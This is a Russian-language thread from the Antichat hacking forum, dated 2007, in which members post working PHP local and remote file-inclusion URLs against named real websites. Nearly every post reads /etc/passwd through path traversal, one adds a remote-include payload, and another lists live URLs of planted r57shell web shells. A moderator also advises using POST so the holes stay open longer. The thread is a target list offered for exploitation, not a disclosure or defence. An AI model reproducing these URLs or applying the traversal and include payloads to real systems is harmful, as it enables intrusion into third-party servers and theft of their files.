Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
20.04.2007, 18:15
|
|
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
Провел на форуме:
4172659
Репутация:
646
|
|
PHP Иньекции
XSS, SQL inj нашел, а вот инклудинга в упор не вижу...
Код:
http://www.rupivo.ru/papers.php?file=../../../../../../etc/passwd
http://quake.olympus.ru/q3/playerstat.php?config=../../../../../../../etc/passwd
|
|
|
20.04.2007, 19:33
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520
Репутация:
2996
|
|
Проведем тест прекрепляю тему на неделю если будет такая же активность как sql Иньекции оставляю.
+Постим только:
+php/perl/jsp иньекции.
+Исполнение произвольного кода.
+Исполнение произвольных команд.
+Статья php injection(http://forum. antichat.ru/thread12123.html ).
+За флуд буду строго наказывать.
+Не забываем про Post метод, если пользоваться Post методом то баги буду дольше жить. Подробности тут(http://forum.antichat.ru/thread24973.html).
При удаленных инклудах
Постим так:
http://site.com/index.php?page=[url]
Последний раз редактировалось [ cash ]; 23.04.2007 в 17:48..
|
|
|
|
21.04.2007, 04:04
|
|
Участник форума
Регистрация: 31.12.2005
Сообщений: 231
Провел на форуме:
1106266
Репутация:
366
|
|
http://www.giga-hamburg.de/index.php?file=../../../../../../../../../../../../../etc/passwd&folder=giga
запостю, только чёт я не уверен что будет такая же активность.
|
|
|
|
21.04.2007, 10:55
|
|
Участник форума
Регистрация: 05.09.2006
Сообщений: 187
Провел на форуме:
6860213
Репутация:
378
|
|
Код:
http://primotechnology.com/index.php?art=../../../../../etc/passwd
уже 210 просомтоов топика.. |
|
|
|
21.04.2007, 11:57
|
|
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777
Репутация:
2642
|
|
Порадовало 
http://www.jff.org/download.php?file=../../../../../../etc/passwd - сохраняем и открываем
|
|
|
|
21.04.2007, 11:59
|
|
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777
Репутация:
2642
|
|
http://www.berlinpolis.de/download.php?file=../../../../../../etc/passwd
- сохраняем как passwd.txt и открываем
|
|
|
|
21.04.2007, 12:01
|
|
Новичок
Регистрация: 18.04.2007
Сообщений: 15
Провел на форуме:
107912
Репутация:
22
|
|
http://www.huntington.laurentian.ca/index.php?file=../../../../../etc/passwd
|
|
|
|
21.04.2007, 12:52
|
|
Познающий
Регистрация: 01.02.2007
Сообщений: 41
Провел на форуме:
1718137
Репутация:
201
|
|
Удаленный инклуд:
Код:
http://www.casadelajuventud.mrg.gov.ar/principal.php?url=h://ttp://::////forum.antichat.ru/antichat/pic/logo.gif?
Немного оффтоп, стало сейчас интересно, всё ли еще можно что-то найти в гугле по запросу "r57shell - http-shell by RST/GHC":
Код:
http://www.aodaitimhue.com/nhacrock/info.php
http://www.shp-berlin.de/en/expertise.php
http://www.auschwitzdanceparty.org/conf/r57.php
http://live8x.com/images/kol.php
http://www.securitysafetysystems.com/includes/mysqlconfig.local.php
http://www.huyhoangkontum.org/h.php
http://www.sniperfoxselacome.com/index.php
http://www.hostingstar.us/rapid/ab.php
http://www.aongtr.ro/g.php
http://wwwreal-estate.com/rel-estate-info/wp-commentsrs.php
|
|
|
|
21.04.2007, 13:08
|
|
Banned
Регистрация: 10.10.2006
Сообщений: 596
Провел на форуме:
2132613
Репутация:
1365
|
|
http://www.webcreativestudio.com/?id=inter¶m=doc_php&lang=2&doc_dop_param=../../../../../../../../etc/passwd
И просматриваем в исходном тексте =)
|
|
|
|
21.04.2007, 13:09
|
|
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777
Репутация:
2642
|
|
http://en.brazilny.org/force-download.php?file=../../../../../../etc/passwd
- сохраняем как passwd.txt и открываем
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
